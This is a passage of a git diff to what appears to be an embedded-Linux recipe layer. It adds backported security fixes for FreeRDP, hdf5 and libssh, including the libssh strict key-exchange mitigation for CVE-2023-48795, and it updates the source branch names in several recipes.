"https://github.com/Exiv2/${BPN}/releases/download/v${PV}/${BP}-Source.tar.gz" SRC_URI[sha256sum] = "a79f5613812aa21755d578a297874fb59a85101e793edc64ec2c6bd994e3e778" # Once patch is obsolete (project should be aware due to PRs), dos2unix can be removed either diff --git a/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39316.patch b/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39316.patch new file mode 100644 index 0000000000..a60b2854c8 --- /dev/null +++ b/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39316.patch @@ -0,0 +1,53 @@ +https://github.com/FreeRDP/FreeRDP/commit/e865c24efc40ebc52e75979c94cdd4ee2c1495b0 +CVE: CVE-2022-39316 +Upstream-Status: Backport +Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> + +From e865c24efc40ebc52e75979c94cdd4ee2c1495b0 Mon Sep 17 00:00:00 2001 +From: akallabeth <akallabeth@posteo.net> +Date: Thu, 13 Oct 2022 09:09:28 +0200 +Subject: [PATCH] Added missing length checks in zgfx_decompress_segment + +(cherry picked from commit 64716b335858109d14f27b51acc4c4d71a92a816) +--- + libfreerdp/codec/zgfx.c | 11 +++++++---- + 1 file changed, 7 insertions(+), 4 deletions(-) + +diff --git a/libfreerdp/codec/zgfx.c b/libfreerdp/codec/zgfx.c +index 20fbd354571..e260aa6e28a 100644 +--- a/libfreerdp/codec/zgfx.c ++++ b/libfreerdp/codec/zgfx.c +@@ -230,19 +230,19 @@ static BOOL zgfx_decompress_segment(ZGFX_CONTEXT* zgfx, wStream* stream, size_t + BYTE* pbSegment; + size_t cbSegment; + +- if (!zgfx || !stream) ++ if (!zgfx || !stream || (segmentSize < 2)) + return FALSE; + + cbSegment = segmentSize - 1; + +- if ((Stream_GetRemainingLength(stream) < segmentSize) || (segmentSize < 1) || +- (segmentSize > UINT32_MAX)) ++ if ((Stream_GetRemainingLength(stream) < segmentSize) || (segmentSize > UINT32_MAX)) + return FALSE; + + Stream_Read_UINT8(stream, flags); /* header (1 byte) */ + zgfx->OutputCount = 0; + pbSegment = Stream_Pointer(stream); +- Stream_Seek(stream, cbSegment); ++ if (!Stream_SafeSeek(stream, cbSegment)) ++ return FALSE; + + if (!(flags & PACKET_COMPRESSED)) + { +@@ -346,6 +346,9 @@ static BOOL zgfx_decompress_segment(ZGFX_CONTEXT* zgfx, wStream* stream, size_t + if (count > sizeof(zgfx->OutputBuffer) - zgfx->OutputCount) + return FALSE; + ++ if (count > zgfx->cBitsRemaining / 8) ++ return FALSE; ++ + CopyMemory(&(zgfx->OutputBuffer[zgfx->OutputCount]), zgfx->pbInputCurrent, + count); + zgfx_history_buffer_ring_write(zgfx, zgfx->pbInputCurrent, count); diff --git a/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39318-39319.patch b/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39318-39319.patch new file mode 100644 index 0000000000..76a9e00dd3 --- /dev/null +++ b/meta-oe/recipes-support/freerdp/freerdp/CVE-2022-39318-39319.patch @@ -0,0 +1,41 @@ +https://github.com/FreeRDP/FreeRDP/commit/80adde17ddc4b596ed1dae0922a0c54ab3d4b8ea +CVE: CVE-2022-39318 CVE-2022-39319 +Upstream-Status: Backport +Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> + +From 80adde17ddc4b596ed1dae0922a0c54ab3d4b8ea Mon Sep 17 00:00:00 2001 +From: akallabeth <akallabeth@posteo.net> +Date: Thu, 13 Oct 2022 08:27:41 +0200 +Subject: [PATCH] Fixed division by zero in urbdrc + +(cherry picked from commit 731f8419d04b481d7160de1f34062d630ed48765) +--- + channels/urbdrc/client/libusb/libusb_udevice.c | 12 +++++++++--- + 1 file changed, 9 insertions(+), 3 deletions(-) + +diff --git a/channels/urbdrc/client/libusb/libusb_udevice.c b/channels/urbdrc/client/libusb/libusb_udevice.c +index 505c31d7b55..ef87f195f38 100644 +--- a/channels/urbdrc/client/libusb/libusb_udevice.c ++++ b/channels/urbdrc/client/libusb/libusb_udevice.c +@@ -1221,12 +1221,18 @@ static int libusb_udev_isoch_transfer(IUDEVICE* idev, URBDRC_CHANNEL_CALLBACK* c + if (!Buffer) + Stream_Seek(user_data->data, (NumberOfPackets * 12)); + +- iso_packet_size = BufferSize / NumberOfPackets; +- iso_transfer = libusb_alloc_transfer(NumberOfPackets); ++ if (NumberOfPackets > 0) ++ { ++ iso_packet_size = BufferSize / NumberOfPackets; ++ iso_transfer = libusb_alloc_transfer((int)NumberOfPackets); ++ } + + if (iso_transfer == NULL) + { +- WLog_Print(urbdrc->log, WLOG_ERROR, "Error: libusb_alloc_transfer."); ++ WLog_Print(urbdrc->log, WLOG_ERROR, ++ "Error: libusb_alloc_transfer [NumberOfPackets=%" PRIu32 ", BufferSize=%" PRIu32 ++ " ]", ++ NumberOfPackets, BufferSize); + async_transfer_user_data_free(user_data); + return -1; + } diff --git a/meta-oe/recipes-support/freerdp/freerdp_2.6.1.bb b/meta-oe/recipes-support/freerdp/freerdp_2.6.1.bb index ece2f56960..9da8b27c0d 100644 --- a/meta-oe/recipes-support/freerdp/freerdp_2.6.1.bb +++ b/meta-oe/recipes-support/freerdp/freerdp_2.6.1.bb @@ -16,6 +16,8 @@ PKGV = "${GITPKGVTAG}" SRCREV = "658a72980f6e93241d927c46cfa664bf2547b8b1" SRC_URI = "git://github.com/FreeRDP/FreeRDP.git;branch=stable-2.0;protocol=https \ file://winpr-makecert-Build-with-install-RPATH.patch \ + file://CVE-2022-39316.patch \ + file://CVE-2022-39318-39319.patch \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/glog/glog_0.5.0.bb b/meta-oe/recipes-support/glog/glog_0.5.0.bb index 61581d96d7..f0b1293965 100644 --- a/meta-oe/recipes-support/glog/glog_0.5.0.bb +++ b/meta-oe/recipes-support/glog/glog_0.5.0.bb @@ -7,7 +7,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=dc9db360e0bbd4e46672f3fd91dd6c4b" SRC_URI = " \ - git://github.com/google/glog.git;nobranch=1;protocol=https \ + git://github.com/google/glog.git;branch=master;protocol=https \ file://libexecinfo.patch \ " diff --git a/meta-oe/recipes-support/gnulib/gnulib_2018-03-07.03.bb b/meta-oe/recipes-support/gnulib/gnulib_2018-12-18.bb index a27968079e..a27968079e 100644 --- a/meta-oe/recipes-support/gnulib/gnulib_2018-03-07.03.bb +++ b/meta-oe/recipes-support/gnulib/gnulib_2018-12-18.bb diff --git a/meta-oe/recipes-support/hdf5/files/CVE-2021-37501.patch b/meta-oe/recipes-support/hdf5/files/CVE-2021-37501.patch new file mode 100644 index 0000000000..01099f3438 --- /dev/null +++ b/meta-oe/recipes-support/hdf5/files/CVE-2021-37501.patch @@ -0,0 +1,37 @@ +From 602015eacc53bf2699bf4c4e5420b63c3f067547 Mon Sep 17 00:00:00 2001 +From: Mingli Yu <mingli.yu@windriver.com> +Date: Mon, 11 Sep 2023 14:01:37 +0800 +Subject: [PATCH] Check for overflow when calculating on-disk attribute data + size + +Bogus sizes in this test case causes the on-disk data size +calculation in H5O_attr_decode() to overflow so that the +calculated size becomes 0. This causes the read to overflow +and h5dump to segfault. + +CVE: CVE-2021-37501 + +Upstream-Status: Backport [https://github.com/HDFGroup/hdf5/commit/b16ec83d4bd79f9ffaad85de16056419f3532887] + +Signed-off-by: Mingli Yu <mingli.yu@windriver.com> +--- + src/H5Oattr.c | 3 +++ + 1 file changed, 3 insertions(+) + +diff --git a/src/H5Oattr.c b/src/H5Oattr.c +index c2c0fe3..c289344 100644 +--- a/src/H5Oattr.c ++++ b/src/H5Oattr.c +@@ -217,6 +217,9 @@ H5O_attr_decode(H5F_t *f, hid_t dxpl_id, H5O_t *open_oh, unsigned H5_ATTR_UNUSED + + /* Compute the size of the data */ + H5_CHECKED_ASSIGN(attr->shared->data_size, size_t, H5S_GET_EXTENT_NPOINTS(attr->shared->ds) * H5T_get_size(attr->shared->dt), hsize_t); ++ /* Check if multiplication has overflown */ ++ if ((attr->shared->data_size / H5T_get_size(attr->shared->dt)) != H5S_GET_EXTENT_NPOINTS(attr->shared->ds)) ++ HGOTO_ERROR(H5E_RESOURCE, H5E_OVERFLOW, NULL, "data size exceeds addressable range"); + + /* Go get the data */ + if(attr->shared->data_size) { +-- +2.25.1 + diff --git a/meta-oe/recipes-support/hdf5/hdf5_1.8.21.bb b/meta-oe/recipes-support/hdf5/hdf5_1.8.21.bb index 7b886a4635..4110e9cea4 100644 --- a/meta-oe/recipes-support/hdf5/hdf5_1.8.21.bb +++ b/meta-oe/recipes-support/hdf5/hdf5_1.8.21.bb @@ -17,6 +17,7 @@ SRC_URI = " \ file://0001-cross-compiling-support.patch \ file://0002-Remove-suffix-shared-from-shared-library-name.patch \ file://0001-cmake-remove-build-flags.patch \ + file://CVE-2021-37501.patch \ " SRC_URI[md5sum] = "2d2408f2a9dfb5c7b79998002e9a90e9" SRC_URI[sha256sum] = "e5b1b1dee44a64b795a91c3321ab7196d9e0871fe50d42969761794e3899f40d" diff --git a/meta-oe/recipes-support/libbytesize/libbytesize_2.6.bb b/meta-oe/recipes-support/libbytesize/libbytesize_2.6.bb index 154973254d..abafaaf7a7 100644 --- a/meta-oe/recipes-support/libbytesize/libbytesize_2.6.bb +++ b/meta-oe/recipes-support/libbytesize/libbytesize_2.6.bb @@ -10,7 +10,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "c9864f4dd03736839f40d225da494cb1eb64e654" -SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=master;protocol=https" +SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=main;protocol=https" inherit gettext autotools pkgconfig python3native diff --git a/meta-oe/recipes-support/libiio/libiio_git.bb b/meta-oe/recipes-support/libiio/libiio_git.bb index bb253f421a..612dd897be 100644 --- a/meta-oe/recipes-support/libiio/libiio_git.bb +++ b/meta-oe/recipes-support/libiio/libiio_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING.txt;md5=7c13b3376cea0ce68d2d2da0a1b3a72c" SRCREV = "92d6a35f3d8d721cda7d6fe664b435311dd368b4" PV = "0.23" -SRC_URI = "git://github.com/analogdevicesinc/libiio.git;protocol=https;branch=master \ +SRC_URI = "git://github.com/analogdevicesinc/libiio.git;protocol=https;branch=main \ file://0001-CMake-Move-include-CheckCSourceCompiles-before-its-m.patch \ " UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)" diff --git a/meta-oe/recipes-support/libmxml/libmxml_3.3.bb b/meta-oe/recipes-support/libmxml/libmxml_3.3.bb index c8e2167795..5169337f58 100644 --- a/meta-oe/recipes-support/libmxml/libmxml_3.3.bb +++ b/meta-oe/recipes-support/libmxml/libmxml_3.3.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=86d3f3a95c324c9479bd8986968f4327" HOMEPAGE = "https://www.msweet.org/mxml/" BUGTRACKER = "https://github.com/michaelrsweet/mxml/issues" -SRC_URI = "git://github.com/michaelrsweet/mxml.git;nobranch=1;protocol=https" +SRC_URI = "git://github.com/michaelrsweet/mxml.git;branch=master;protocol=https" SRCREV = "0237559fdbcecae34157b547aa2b99e12de305a2" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/libssh/libssh/CVE-2020-16135.patch b/meta-oe/recipes-support/libssh/libssh/CVE-2020-16135.patch new file mode 100644 index 0000000000..63b78688dd --- /dev/null +++ b/meta-oe/recipes-support/libssh/libssh/CVE-2020-16135.patch @@ -0,0 +1,44 @@ +From 0a9268a60f2d3748ca69bde5651f20e72761058c Mon Sep 17 00:00:00 2001 +From: Andreas Schneider <asn@cryptomilk.org> +Date: Wed, 3 Jun 2020 10:04:09 +0200 +Subject: CVE-2020-16135: Add missing NULL check for ssh_buffer_new() + +Add a missing NULL check for the pointer returned by ssh_buffer_new() in +sftpserver.c. + +Thanks to Ramin Farajpour Cami for spotting this. + +Fixes T232 + +Signed-off-by: Andreas Schneider <asn@cryptomilk.org> +Reviewed-by: Anderson Toshiyuki Sasaki <ansasaki@redhat.com> +Reviewed-by: Jakub Jelen <jjelen@redhat.com> +(cherry picked from commit 533d881b0f4b24c72b35ecc97fa35d295d063e53) + +Upstream-Status: Backport [https://git.libssh.org/projects/libssh.git/patch/?id=0a9268a60f2d3748ca69bde5651f20e72761058c] +CVE: CVE-2020-16135 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + src/sftpserver.c | 6 ++++++ + 1 file changed, 6 insertions(+) + +diff --git a/src/sftpserver.c b/src/sftpserver.c +index 1717aa417..1af8a0e76 100644 +--- a/src/sftpserver.c ++++ b/src/sftpserver.c +@@ -64,6 +64,12 @@ sftp_client_message sftp_get_client_message(sftp_session sftp) { + + /* take a copy of the whole packet */ + msg->complete_message = ssh_buffer_new(); ++ if (msg->complete_message == NULL) { ++ ssh_set_error_oom(session); ++ sftp_client_message_free(msg); ++ return NULL; ++ } ++ + ssh_buffer_add_data(msg->complete_message, + ssh_buffer_get(payload), + ssh_buffer_get_len(payload)); +-- +2.25.1 + diff --git a/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-1.patch b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-1.patch new file mode 100644 index 0000000000..413e5b3d11 --- /dev/null +++ b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-1.patch @@ -0,0 +1,385 @@ +From 4cef5e965a46e9271aed62631b152e4bd23c1e3c Mon Sep 17 00:00:00 2001 +From: Aris Adamantiadis <aris@0xbadc0de.be> +Date: Tue, 12 Dec 2023 23:09:57 +0100 +Subject: [PATCH] CVE-2023-48795: client side mitigation + +Signed-off-by: Aris Adamantiadis <aris@0xbadc0de.be> +Signed-off-by: Jakub Jelen <jjelen@redhat.com> +Reviewed-by: Andreas Schneider <asn@cryptomilk.org> + +Upstream-Status: Backport [https://gitlab.com/libssh/libssh-mirror/-/commit/4cef5e965a46e9271aed62631b152e4bd23c1e3c] +CVE: CVE-2023-48795 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + include/libssh/packet.h | 1 + + include/libssh/session.h | 6 +++++ + src/curve25519.c | 18 +++---------- + src/dh.c | 6 +---- + src/ecdh.c | 7 +---- + src/ecdh_crypto.c | 10 ++----- + src/ecdh_gcrypt.c | 10 +++---- + src/ecdh_mbedcrypto.c | 11 +++----- + src/kex.c | 34 ++++++++++++++++++++---- + src/packet.c | 56 +++++++++++++++++++++++++++++++++++++++- + src/packet_cb.c | 12 +++++++++ + 11 files changed, 118 insertions(+), 53 deletions(-) + +diff --git a/include/libssh/packet.h b/include/libssh/packet.h +index fbe09700..8800e16b 100644 +--- a/include/libssh/packet.h ++++ b/include/libssh/packet.h +@@ -63,6 +63,7 @@ SSH_PACKET_CALLBACK(ssh_packet_ext_info); + SSH_PACKET_CALLBACK(ssh_packet_kexdh_init); + #endif + ++int ssh_packet_send_newkeys(ssh_session session); + int ssh_packet_send_unimplemented(ssh_session session, uint32_t seqnum); + int ssh_packet_parse_type(ssh_session session); + //int packet_flush(ssh_session session, int enforce_blocking); +diff --git a/include/libssh/session.h b/include/libssh/session.h +index 23633cc2..b8810f54 100644 +--- a/include/libssh/session.h ++++ b/include/libssh/session.h +@@ -69,6 +69,12 @@ enum ssh_pending_call_e { + /* Client successfully authenticated */ + #define SSH_SESSION_FLAG_AUTHENTICATED 2 + ++/* The current SSH2 session implements the "strict KEX" feature and should behave ++ * differently on SSH2_MSG_NEWKEYS. */ ++#define SSH_SESSION_FLAG_KEX_STRICT 0x0010 ++/* Unexpected packets have been sent while the session was still unencrypted */ ++#define SSH_SESSION_FLAG_KEX_TAINTED 0x0020 ++ + /* codes to use with ssh_handle_packets*() */ + /* Infinite timeout */ + #define SSH_TIMEOUT_INFINITE -1 +diff --git a/src/curve25519.c b/src/curve25519.c +index 167209f4..6eda5feb 100644 +--- a/src/curve25519.c ++++ b/src/curve25519.c +@@ -166,12 +166,7 @@ int ssh_client_curve25519_reply(ssh_session session, ssh_buffer packet){ + } + + /* Send the MSG_NEWKEYS */ +- if (ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS) < 0) { +- goto error; +- } +- +- rc=ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); ++ rc = ssh_packet_send_newkeys(session); + return rc; + error: + return SSH_ERROR; +@@ -297,15 +292,10 @@ int ssh_server_curve25519_init(ssh_session session, ssh_buffer packet){ + return SSH_ERROR; + } + +- /* Send the MSG_NEWKEYS */ +- rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); +- if (rc < 0) { +- goto error; +- } +- + session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; +- rc = ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); ++ ++ /* Send the MSG_NEWKEYS */ ++ rc = ssh_packet_send_newkeys(session); + + return rc; + error: +diff --git a/src/dh.c b/src/dh.c +index cc12fd46..33883f2d 100644 +--- a/src/dh.c ++++ b/src/dh.c +@@ -735,11 +735,7 @@ int ssh_client_dh_reply(ssh_session session, ssh_buffer packet){ + } + + /* Send the MSG_NEWKEYS */ +- if (ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS) < 0) { +- goto error; +- } +- +- rc=ssh_packet_send(session); ++ rc = ssh_packet_send_newkeys(session); + SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); + return rc; + error: +diff --git a/src/ecdh.c b/src/ecdh.c +index f7fcaf13..1fef7ec9 100644 +--- a/src/ecdh.c ++++ b/src/ecdh.c +@@ -72,12 +72,7 @@ int ssh_client_ecdh_reply(ssh_session session, ssh_buffer packet){ + } + + /* Send the MSG_NEWKEYS */ +- if (ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS) < 0) { +- goto error; +- } +- +- rc=ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); ++ rc = ssh_packet_send_newkeys(session); + return rc; + error: + return SSH_ERROR; +diff --git a/src/ecdh_crypto.c b/src/ecdh_crypto.c +index 24f21c03..7e5f0cc7 100644 +--- a/src/ecdh_crypto.c ++++ b/src/ecdh_crypto.c +@@ -318,15 +318,9 @@ int ssh_server_ecdh_init(ssh_session session, ssh_buffer packet){ + return SSH_ERROR; + } + +- /* Send the MSG_NEWKEYS */ +- rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); +- if (rc < 0) { +- return SSH_ERROR;; +- } +- + session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; +- rc = ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); ++ /* Send the MSG_NEWKEYS */ ++ rc = ssh_packet_send_newkeys(session); + + return rc; + } +diff --git a/src/ecdh_gcrypt.c b/src/ecdh_gcrypt.c +index e43cacea..c1db7f5d 100644 +--- a/src/ecdh_gcrypt.c ++++ b/src/ecdh_gcrypt.c +@@ -362,17 +362,13 @@ int ssh_server_ecdh_init(ssh_session session, ssh_buffer packet) { + goto out; + } + +- ++ session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; + /* Send the MSG_NEWKEYS */ +- rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); +- if (rc != SSH_OK) { ++ rc = ssh_packet_send_newkeys(session); ++ if (rc == SSH_ERROR) { + goto out; + } + +- session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; +- rc = ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); +- + out: + gcry_sexp_release(param); + gcry_sexp_release(key); +diff --git a/src/ecdh_mbedcrypto.c b/src/ecdh_mbedcrypto.c +index fa350028..24924508 100644 +--- a/src/ecdh_mbedcrypto.c ++++ b/src/ecdh_mbedcrypto.c +@@ -293,16 +293,13 @@ int ssh_server_ecdh_init(ssh_session session, ssh_buffer packet) + goto out; + } + +- rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); +- if (rc < 0) { +- rc = SSH_ERROR; ++ session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; ++ /* Send the MSG_NEWKEYS */ ++ rc = ssh_packet_send_newkeys(session); ++ if (rc == SSH_ERROR) { + goto out; + } + +- session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; +- rc = ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); +- + out: + mbedtls_ecp_group_free(&grp); + return rc; +diff --git a/src/kex.c b/src/kex.c +index 82686e4b..7f1bb324 100644 +--- a/src/kex.c ++++ b/src/kex.c +@@ -105,6 +105,9 @@ + + /* RFC 8308 */ + #define KEX_EXTENSION_CLIENT "ext-info-c" ++/* Strict kex mitigation against CVE-2023-48795 */ ++#define KEX_STRICT_CLIENT "kex-strict-c-v00@openssh.com" ++#define KEX_STRICT_SERVER "kex-strict-s-v00@openssh.com" + + /* NOTE: This is a fixed API and the index is defined by ssh_kex_types_e */ + static const char *default_methods[] = { +@@ -521,6 +524,27 @@ SSH_PACKET_CALLBACK(ssh_packet_kexinit){ + goto error; + } + ++ /* ++ * handle the "strict KEX" feature. If supported by peer, then set up the ++ * flag and verify packet sequence numbers. ++ */ ++ if (server_kex) { ++ ok = ssh_match_group(session->next_crypto->client_kex.methods[SSH_KEX], ++ KEX_STRICT_CLIENT); ++ if (ok) { ++ SSH_LOG(SSH_LOG_DEBUG, "Client supports strict kex, enabling."); ++ session->flags |= SSH_SESSION_FLAG_KEX_STRICT; ++ } ++ } else { ++ /* client kex */ ++ ok = ssh_match_group(session->next_crypto->server_kex.methods[SSH_KEX], ++ KEX_STRICT_SERVER); ++ if (ok) { ++ SSH_LOG(SSH_LOG_DEBUG, "Server supports strict kex, enabling."); ++ session->flags |= SSH_SESSION_FLAG_KEX_STRICT; ++ } ++ } ++ + /* + * If client sent a ext-info-c message in the kex list, it supports + * RFC 8308 extension negotiation. +@@ -778,21 +802,21 @@ int ssh_set_client_kex(ssh_session session) + return SSH_OK; + } + +- /* Here we append ext-info-c to the list of kex algorithms */ ++ /* Here we append ext-info-c and kex-strict-c-v00@openssh.com to the list of kex algorithms */ + kex = client->methods[SSH_KEX]; + len = strlen(kex); +- if (len + strlen(KEX_EXTENSION_CLIENT) + 2 < len) { ++ /* Comma, comma, nul byte */ ++ kex_len = len + 1 + strlen(KEX_EXTENSION_CLIENT) + 1 + strlen(KEX_STRICT_CLIENT ) + 1; ++ if (kex_len >= MAX_PACKET_LEN) { + /* Overflow */ + return SSH_ERROR; + } +- kex_len = len + strlen(KEX_EXTENSION_CLIENT) + 2; /* comma, NULL */ + kex_tmp = realloc(kex, kex_len); + if (kex_tmp == NULL) { +- free(kex); + ssh_set_error_oom(session); + return SSH_ERROR; + } +- snprintf(kex_tmp + len, kex_len - len, ",%s", KEX_EXTENSION_CLIENT); ++ snprintf(kex_tmp + len, kex_len - len, ",%s,%s", KEX_EXTENSION_CLIENT, KEX_STRICT_CLIENT); + client->methods[SSH_KEX] = kex_tmp; + + return SSH_OK; +diff --git a/src/packet.c b/src/packet.c +index 61a44237..8025a7ff 100644 +--- a/src/packet.c ++++ b/src/packet.c +@@ -1126,6 +1126,19 @@ int ssh_packet_socket_callback(const void *data, size_t receivedlen, void *user) + } + #endif /* WITH_ZLIB */ + payloadsize = ssh_buffer_get_len(session->in_buffer); ++ if (session->recv_seq == UINT32_MAX) { ++ /* Overflowing sequence numbers is always fishy */ ++ if (session->current_crypto == NULL) { ++ /* don't allow sequence number overflow when unencrypted */ ++ ssh_set_error(session, ++ SSH_FATAL, ++ "Incoming sequence number overflow"); ++ goto error; ++ } else { ++ SSH_LOG(SSH_LOG_WARNING, ++ "Incoming sequence number overflow"); ++ } ++ } + session->recv_seq++; + if (session->raw_counter != NULL) { + session->raw_counter->in_bytes += payloadsize; +@@ -1141,7 +1154,19 @@ int ssh_packet_socket_callback(const void *data, size_t receivedlen, void *user) + SSH_LOG(SSH_LOG_PACKET, + "packet: read type %hhd [len=%d,padding=%hhd,comp=%d,payload=%d]", + session->in_packet.type, packet_len, padding, compsize, payloadsize); +- ++ if (session->current_crypto == NULL) { ++ /* In strict kex, only a few packets are allowed. Taint the session ++ * if we received packets that are normally allowed but to be ++ * refused if we are in strict kex when KEX is over. ++ */ ++ uint8_t type = session->in_packet.type; ++ ++ if (type != SSH2_MSG_KEXINIT && type != SSH2_MSG_NEWKEYS && ++ (type < SSH2_MSG_KEXDH_INIT || ++ type > SSH2_MSG_KEX_DH_GEX_REQUEST)) { ++ session->flags |= SSH_SESSION_FLAG_KEX_TAINTED; ++ } ++ } + /* Check if the packet is expected */ + filter_result = ssh_packet_incoming_filter(session); + +@@ -1153,6 +1178,9 @@ int ssh_packet_socket_callback(const void *data, size_t receivedlen, void *user) + case SSH_PACKET_DENIED: + goto error; + case SSH_PACKET_UNKNOWN: ++ if (session->current_crypto == NULL) { ++ session->flags |= SSH_SESSION_FLAG_KEX_TAINTED; ++ } + ssh_packet_send_unimplemented(session, session->recv_seq - 1); + break; + } +@@ -1276,9 +1304,35 @@ void ssh_packet_process(ssh_session session, uint8_t type){ + if(r==SSH_PACKET_NOT_USED){ + SSH_LOG(SSH_LOG_RARE,"Couldn't do anything with packet type %d",type); + ssh_packet_send_unimplemented(session, session->recv_seq-1); ++ if (session->current_crypto == NULL) { ++ session->flags |= SSH_SESSION_FLAG_KEX_TAINTED; ++ } + } + } + ++/** @internal ++ * @brief sends a SSH_MSG_NEWKEYS when enabling the new negotiated ciphers ++ * @param session the SSH session ++ * @return SSH_ERROR on error, else SSH_OK ++ */ ++int ssh_packet_send_newkeys(ssh_session session) ++{ ++ int rc; ++ ++ /* Send the MSG_NEWKEYS */ ++ rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); ++ if (rc < 0) { ++ return rc; ++ } ++ ++ rc = ssh_packet_send(session); ++ if (rc == SSH_ERROR) { ++ return rc; ++ } ++ SSH_LOG(SSH_LOG_DEBUG, "SSH_MSG_NEWKEYS sent"); ++ return rc; ++} ++ + /** @internal + * @brief sends a SSH_MSG_UNIMPLEMENTED answer to an unhandled packet + * @param session the SSH session +diff --git a/src/packet_cb.c b/src/packet_cb.c +index 6aa64766..de03fb07 100644 +--- a/src/packet_cb.c ++++ b/src/packet_cb.c +@@ -154,6 +154,18 @@ SSH_PACKET_CALLBACK(ssh_packet_newkeys){ + goto error; + } + ++ if (session->flags & SSH_SESSION_FLAG_KEX_STRICT) { ++ /* reset packet sequence number when running in strict kex mode */ ++ session->recv_seq = 0; ++ /* Check that we aren't tainted */ ++ if (session->flags & SSH_SESSION_FLAG_KEX_TAINTED) { ++ ssh_set_error(session, ++ SSH_FATAL, ++ "Received unexpected packets in strict KEX mode."); ++ goto error; ++ } ++} ++ + if(session->server){ + /* server things are done in server.c */ + session->dh_handshake_state=DH_STATE_FINISHED; +-- +2.25.1 + diff --git a/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-2.patch b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-2.patch new file mode 100644 index 0000000000..fe3300503f --- /dev/null +++ b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-2.patch @@ -0,0 +1,126 @@ +From 0870c8db28be9eb457ee3d4f9a168959d9507efd Mon Sep 17 00:00:00 2001 +From: Aris Adamantiadis <aris@0xbadc0de.be> +Date: Tue, 12 Dec 2023 23:30:26 +0100 +Subject: [PATCH] CVE-2023-48795: Server side mitigations + +Signed-off-by: Aris Adamantiadis <aris@0xbadc0de.be> +Signed-off-by: Jakub Jelen <jjelen@redhat.com> +Reviewed-by: Andreas Schneider <asn@cryptomilk.org> + +Upstream-Status: Backport [https://gitlab.com/libssh/libssh-mirror/-/commit/0870c8db28be9eb457ee3d4f9a168959d9507efd] +CVE: CVE-2023-48795 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + include/libssh/kex.h | 1 + + src/kex.c | 46 ++++++++++++++++++++++++++++++++++---------- + src/server.c | 8 +++++++- + 3 files changed, 44 insertions(+), 11 deletions(-) + +diff --git a/include/libssh/kex.h b/include/libssh/kex.h +index a626d105..2b1a74d5 100644 +--- a/include/libssh/kex.h ++++ b/include/libssh/kex.h +@@ -36,6 +36,7 @@ SSH_PACKET_CALLBACK(ssh_packet_kexinit); + int ssh_send_kex(ssh_session session, int server_kex); + void ssh_list_kex(struct ssh_kex_struct *kex); + int ssh_set_client_kex(ssh_session session); ++int ssh_kex_append_extensions(ssh_session session, struct ssh_kex_struct *pkex); + int ssh_kex_select_methods(ssh_session session); + int ssh_verify_existing_algo(enum ssh_kex_types_e algo, const char *name); + char *ssh_keep_known_algos(enum ssh_kex_types_e algo, const char *list); +diff --git a/src/kex.c b/src/kex.c +index 2ed90235..b03e6484 100644 +--- a/src/kex.c ++++ b/src/kex.c +@@ -766,11 +766,8 @@ int ssh_set_client_kex(ssh_session session) + { + struct ssh_kex_struct *client= &session->next_crypto->client_kex; + const char *wanted; +- char *kex = NULL; +- char *kex_tmp = NULL; + int ok; + int i; +- size_t kex_len, len; + + ok = ssh_get_random(client->cookie, 16, 0); + if (!ok) { +@@ -802,11 +799,33 @@ int ssh_set_client_kex(ssh_session session) + return SSH_OK; + } + +- /* Here we append ext-info-c and kex-strict-c-v00@openssh.com to the list of kex algorithms */ +- kex = client->methods[SSH_KEX]; ++ ok = ssh_kex_append_extensions(session, client); ++ if (ok != SSH_OK){ ++ return ok; ++ } ++ ++ return SSH_OK; 